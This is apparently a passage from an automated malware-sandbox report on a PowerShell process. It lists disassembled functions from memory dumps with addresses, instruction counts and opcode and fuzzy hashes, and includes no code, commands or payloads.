                                                                                                                  • Opcode ID: 2746a91058a40b00b6b2907adb38f85e01afd81599fc7cf2992a5b3d121ac897
                                                                                                                  • Instruction ID: 03fb146940b80c58d24495dc5c8498fbee0405f9873f39775e05238ac2dff411
                                                                                                                  • Opcode Fuzzy Hash: 2746a91058a40b00b6b2907adb38f85e01afd81599fc7cf2992a5b3d121ac897
                                                                                                                  • Instruction Fuzzy Hash: C741F37041DBC48FE7969B299C95A523FF0EF53220B1905DFD088CB1A3D629B84AC792
                                                                                                                  Function 00007FFD348C28F8 Relevance: .1, Instructions: 104COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 600ea0306437669d6b845ef5af6ebd4bdea8d94d455a94437f11de34e952d4f6
                                                                                                                  • Instruction ID: 9b684f4331191c8848922fd00b8038f19503315e10f873c9c92a06715e328dfe
                                                                                                                  • Opcode Fuzzy Hash: 600ea0306437669d6b845ef5af6ebd4bdea8d94d455a94437f11de34e952d4f6
                                                                                                                  • Instruction Fuzzy Hash: 3A21073190C74C4FDB59DF9CD84A7E97BE4EBA6331F00426BD049C3162D674A45ACB91
                                                                                                                  Function 00007FFD348C7F64 Relevance: .1, Instructions: 92COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a8ce0af5413e8fd83421e6c788ab71ad12062a4e9f23e7a2607f2eaf8ac6b9ed
                                                                                                                  • Instruction ID: d9f80db144cbfc74fbd30fafc4d42525d722336510ea01a3a934516124e0e67f
                                                                                                                  • Opcode Fuzzy Hash: a8ce0af5413e8fd83421e6c788ab71ad12062a4e9f23e7a2607f2eaf8ac6b9ed
                                                                                                                  • Instruction Fuzzy Hash: 6231FE70A1868E8EFBB4AF14CDAABF972D4FF42319F40453AD90DC6092CA7C6945DA11
                                                                                                                  Function 00007FFD348B8924 Relevance: .1, Instructions: 73COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: e1eb0f600ab69d582f7146521644943f7a53629cf70089fcbb4f7278ca02e24e
                                                                                                                  • Instruction ID: 9e40b14e8de2772f55e125ca074e54adfc15b549d89c1b8abd17c1d85127642c
                                                                                                                  • Opcode Fuzzy Hash: e1eb0f600ab69d582f7146521644943f7a53629cf70089fcbb4f7278ca02e24e
                                                                                                                  • Instruction Fuzzy Hash: A411D37271C7054FD75CDE1CD8D146577E1EB99360B50093EE0CAC36A6EE26F8428B42
                                                                                                                  Function 00007FFD348B5675 Relevance: .0, Instructions: 49COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 643aa879a4fb92eb3df55465fe6e5ed589bf22b639f6b071dbcc2ff82345d9bf
                                                                                                                  • Instruction ID: fb7e137b78c83b3d1dc6f2c85adb4bb9d72613bf1f86f041c7a104eaa1d040b2
                                                                                                                  • Opcode Fuzzy Hash: 643aa879a4fb92eb3df55465fe6e5ed589bf22b639f6b071dbcc2ff82345d9bf
                                                                                                                  • Instruction Fuzzy Hash: 5C01677121CB0C4FD744EF4CE451AA5B7E0FB99364F10056EE58AC3691DA36E881CB45
                                                                                                                  Function 00007FFD348B6B58 Relevance: .0, Instructions: 39COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6e2de2f32daf0fd5ab6cb6fad72adb765b76f53c4a94bf305dc6ac16ff9e7b8b
                                                                                                                  • Instruction ID: 153eefe8dd41104444a768fd0b1ada2ca64eaa38816bba32f3c53b808992e8c4
                                                                                                                  • Opcode Fuzzy Hash: 6e2de2f32daf0fd5ab6cb6fad72adb765b76f53c4a94bf305dc6ac16ff9e7b8b
                                                                                                                  • Instruction Fuzzy Hash: CDF0303275C6048FDB5CAA5CF8529B573E1EB99324B10016EE48BC3696E927F8428686
                                                                                                                  Function 00007FFD34B679B2 Relevance: .0, Instructions: 39COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2275257019.00007FFD34B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34B60000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34b60000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0613a71783e4163598efa825b56d43b13381558be595072d7b75f22bb9f8e5a4
                                                                                                                  • Instruction ID: 6a77273120d108584b165f1983af31c219be8553523be2af5d74e176bc6a3faa
                                                                                                                  • Opcode Fuzzy Hash: 0613a71783e4163598efa825b56d43b13381558be595072d7b75f22bb9f8e5a4
                                                                                                                  • Instruction Fuzzy Hash: 68F0BE32B0D5049FDB68EB4CE4928A873E0FF5633071400B6E24CC75A3DA2AEC05CB81
                                                                                                                  Function 00007FFD348C2740 Relevance: .0, Instructions: 36COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 6d2fcf5b06d3b6e54d15b60e9986cdd6684be8b1207f5f7460859e4002a9ff5b
                                                                                                                  • Instruction ID: 7ab22c226f1d85a464ec2c3bda4951fa218a1983cc0d7d4a47b8fc267603962f
                                                                                                                  • Opcode Fuzzy Hash: 6d2fcf5b06d3b6e54d15b60e9986cdd6684be8b1207f5f7460859e4002a9ff5b
                                                                                                                  • Instruction Fuzzy Hash: 28F0BB3584C6894FDB16DF2888595D9BFE0FF17310B0502ABE458C70F2DB649955C7C2

                                                                                                                  Non-executed Functions

                                                                                                                  Function 00007FFD348B8BFA Relevance: 4.3, Strings: 3, Instructions: 529COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: L_^$L_^$L_^
                                                                                                                  • API String ID: 0-639022185
                                                                                                                  • Opcode ID: 914fb43a5255ce9bc1fd59a2850fad16592a15d994f351f5d65a6491f7b2c8c2
                                                                                                                  • Instruction ID: 13567d5d483fd986b5cb76b3dbccc1b995ff6ec2ebb46edf7553c1c067571f51
                                                                                                                  • Opcode Fuzzy Hash: 914fb43a5255ce9bc1fd59a2850fad16592a15d994f351f5d65a6491f7b2c8c2
                                                                                                                  • Instruction Fuzzy Hash: 2A02F671A08A498FDB95DF5CC4A5AED7BE1FF6A310F14017AD009D7292DE78A842CBC1
                                                                                                                  Function 00007FFD349863C3 Relevance: .6, Instructions: 626COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270724899.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34980000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 241d289eeccbbb9108a2baa4de676ccb8f207d2b617932db7ce0e378424b52d8
                                                                                                                  • Instruction ID: 5179d942415188420711aefae0efd0ed6ca6db107d5c8a82e64d7b58b291d923
                                                                                                                  • Opcode Fuzzy Hash: 241d289eeccbbb9108a2baa4de676ccb8f207d2b617932db7ce0e378424b52d8
                                                                                                                  • Instruction Fuzzy Hash: 1202E621B0EBC94FDB969A3C88A59643BE1EF6731071901FFC149CB1A7D919DC46C391
                                                                                                                  Function 00007FFD3498241C Relevance: .6, Instructions: 571COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270724899.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34980000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: d01d3c0fabd16d5ce03a45f87788e8490f62bf0a99e19f29598755a081c54c63
                                                                                                                  • Instruction ID: dc4f573e0fd2ba038d9d205b570f509ff3f01e81b61517860788917b9420bc84
                                                                                                                  • Opcode Fuzzy Hash: d01d3c0fabd16d5ce03a45f87788e8490f62bf0a99e19f29598755a081c54c63
                                                                                                                  • Instruction Fuzzy Hash: EC022721A0DB854FDB86DB3CC8A59643BE1EF57310B1901EEC589CF197D929EC46C3A1
                                                                                                                  Function 00007FFD34982EF3 Relevance: .5, Instructions: 519COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270724899.00007FFD34980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34980000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd34980000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 80ddb929e75e3640002bfb228975dc8847d2e77f73d052d3c736f7d5ccf89cb9
                                                                                                                  • Instruction ID: f7ffd8251638acffe59de0372f5af3d466ecdb4eab3fedf4ee072883170d88db
                                                                                                                  • Opcode Fuzzy Hash: 80ddb929e75e3640002bfb228975dc8847d2e77f73d052d3c736f7d5ccf89cb9
                                                                                                                  • Instruction Fuzzy Hash: 36E13621A0EBC51FEB9A973C88A59613FE1EF5B31071901EEC589CB0A7D919EC46C391
                                                                                                                  Function 00007FFD348B4FF3 Relevance: .3, Instructions: 281COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a635815d6f8ae67203642db8ad0a240569e98b01207fcde5116bf26a4c6115bf
                                                                                                                  • Instruction ID: 91a793f2027eed03ac38b7162d43180ee83a9a9374e84625c3c35f4885dfc77b
                                                                                                                  • Opcode Fuzzy Hash: a635815d6f8ae67203642db8ad0a240569e98b01207fcde5116bf26a4c6115bf
                                                                                                                  • Instruction Fuzzy Hash: ED71794BB0EBD21EF292576C68F70E53BD0DE532B970910B7C685CA1539D4E180BA6E3
                                                                                                                  Function 00007FFD348B7727 Relevance: .2, Instructions: 214COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: f564802db2bfeaa9428df61588b38d8a2da7d464d2870ed2c3c8243204c73074
                                                                                                                  • Instruction ID: da94c211b6f43dec584fdf4580c851f08319e9bc52469f7e8bed54abe9c916b5
                                                                                                                  • Opcode Fuzzy Hash: f564802db2bfeaa9428df61588b38d8a2da7d464d2870ed2c3c8243204c73074
                                                                                                                  • Instruction Fuzzy Hash: 07518047B0DB821EF712526C68BA0EA3BD4EF9336570D11B3CA85CA193AD4D1807A2D7
                                                                                                                  Function 00007FFD348B3803 Relevance: .2, Instructions: 188COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 9c237966404684ff235e6e99782c3469e89489d787e45c54fff20fef98bf2230
                                                                                                                  • Instruction ID: 72637170c06bccbdb94aaed052872aa4e78d7af113fee45bff38d6141427a657
                                                                                                                  • Opcode Fuzzy Hash: 9c237966404684ff235e6e99782c3469e89489d787e45c54fff20fef98bf2230
                                                                                                                  • Instruction Fuzzy Hash: E6519256B0D6D66FE612A7BCA4F20E93FA0DF1332470D01B7C284CA493ED9D6407A292
                                                                                                                  Function 00007FFD348B75FA Relevance: .2, Instructions: 150COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0e73629c1b61a9808072def581ed0421f6d6b5e5bd8e17724499f6a26fbe6731
                                                                                                                  • Instruction ID: 789304a5e0d9800ee1d93abe54369bbf810f1ab151a87e5f105a93f4eb405367
                                                                                                                  • Opcode Fuzzy Hash: 0e73629c1b61a9808072def581ed0421f6d6b5e5bd8e17724499f6a26fbe6731
                                                                                                                  • Instruction Fuzzy Hash: 6F31564BB0DB921EF666522C18FB0EA3BD4DF532B574921B3C745C61936D4E180B51D2
                                                                                                                  Function 00007FFD348B50FA Relevance: .1, Instructions: 129COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 1fa38ee433dabf2b4fccdbadaad80eb8e960d56677b52e96096d4010042e7916
                                                                                                                  • Instruction ID: ce2a366aa5ab7923f50d1e9a8a34a2cf6443ae2931b2d7ad889f278396c9ca37
                                                                                                                  • Opcode Fuzzy Hash: 1fa38ee433dabf2b4fccdbadaad80eb8e960d56677b52e96096d4010042e7916
                                                                                                                  • Instruction Fuzzy Hash: 5D31574BB0F7D21EF292936C58B60EA7FD0DE5327D70910B7C6C5CA1539D4E1807A6A2
                                                                                                                  Function 00007FFD348BB648 Relevance: .1, Instructions: 70COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fbb0a5636f9c9a7239f5b8f55d8a0ab09f90459cc2412413cc0f8d25e1fe2afb
                                                                                                                  • Instruction ID: e58f0ae21a3aa8186352e7b9d2d109203e2a44aec266233a07fa8a5f60bbee36
                                                                                                                  • Opcode Fuzzy Hash: fbb0a5636f9c9a7239f5b8f55d8a0ab09f90459cc2412413cc0f8d25e1fe2afb
                                                                                                                  • Instruction Fuzzy Hash: B821C85290DEC24FE266473D48FE0E96FE0EF1335474915BAC2A683493EE0E38079786
                                                                                                                  Function 00007FFD348B8AFA Relevance: 7.6, Strings: 6, Instructions: 129COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: L_^$L_^$L_^$L_^$L_^$L_^
                                                                                                                  • API String ID: 0-2894164595
                                                                                                                  • Opcode ID: a5ce9d3b8c74b56561f196c0c9b9c60a35be2733bda158cbcdcec53859ede93a
                                                                                                                  • Instruction ID: b9427e4cd4a9fc458d69bff7d9f51d2479722cd7f2f320c121381b5e51517d7c
                                                                                                                  • Opcode Fuzzy Hash: a5ce9d3b8c74b56561f196c0c9b9c60a35be2733bda158cbcdcec53859ede93a
                                                                                                                  • Instruction Fuzzy Hash: FC418397B0D6C25FF262433908BA0E96FD0EF5332475D18FAC6D487093ED5D2807A68A
                                                                                                                  Function 00007FFD348B89FA Relevance: 6.4, Strings: 5, Instructions: 102COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2270062322.00007FFD348B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348B0000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd348b0000_powershell.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: L_^$L_^$L_^$L_^$L_^
                                                                                                                  • API String ID: 0-2264858084
                                                                                                                  • Opcode ID: ffd5dabcdff3484c5a72de478efd015710e4139430a0dc9fff7a0585493942c0
                                                                                                                  • Instruction ID: a28534dc1770981e420c7dfb68c603d0237652b22ebbcbc937a5a4028d6efefd
                                                                                                                  • Opcode Fuzzy Hash: ffd5dabcdff3484c5a72de478efd015710e4139430a0dc9fff7a0585493942c0
                                                                                                                  • Instruction Fuzzy Hash: AC31D4A2B0D6C25FF266472908FA0996FD0EF1335470D25F5C2E487093AD6D78479786